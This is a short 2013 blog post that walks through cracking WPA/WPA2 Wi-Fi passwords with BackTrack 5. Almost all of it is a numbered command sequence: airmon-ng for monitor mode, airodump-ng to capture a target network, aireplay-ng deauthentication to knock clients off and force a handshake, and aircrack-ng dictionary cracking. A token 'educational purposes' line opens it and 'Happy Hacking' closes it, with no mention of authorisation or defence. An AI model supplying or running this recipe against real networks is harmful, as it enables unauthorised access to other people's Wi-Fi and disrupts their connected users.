Thursday, 14 November 2013

How To Hack Wi-Fi WPA/WPA2 Password With Backtrack 5 .

Hey guys , this article is only for educational purposes , Today I will tell you about "How To Hack Wi-Fi WPA/WPA2 Password With Backtrack 5 ".




Equipment Needed :-

1)BackTrack 5 (R1 or R2)

2)Compatible WiFi Card

So Let's Start , 
1)Open Terminal .

2)In Terminal type : airmon-ng there we can see interfaces .

3)Then type : airmon-ng start wlan0 It must found proceses .

4)Then we type : airodump-ng mon0 , it will start scanning wi-fi networks .

5)Copy bssid and type : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0 .

6)Type : aireplay-ng -0 5 -a (bssid) mon0 .

7)Click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in terminal .

8)Type in terminal  : aircrack-ng (filename)*.cap -w (dictionary location) and hit Enter .

Happy Hacking !!!

Labels: , , , , , ,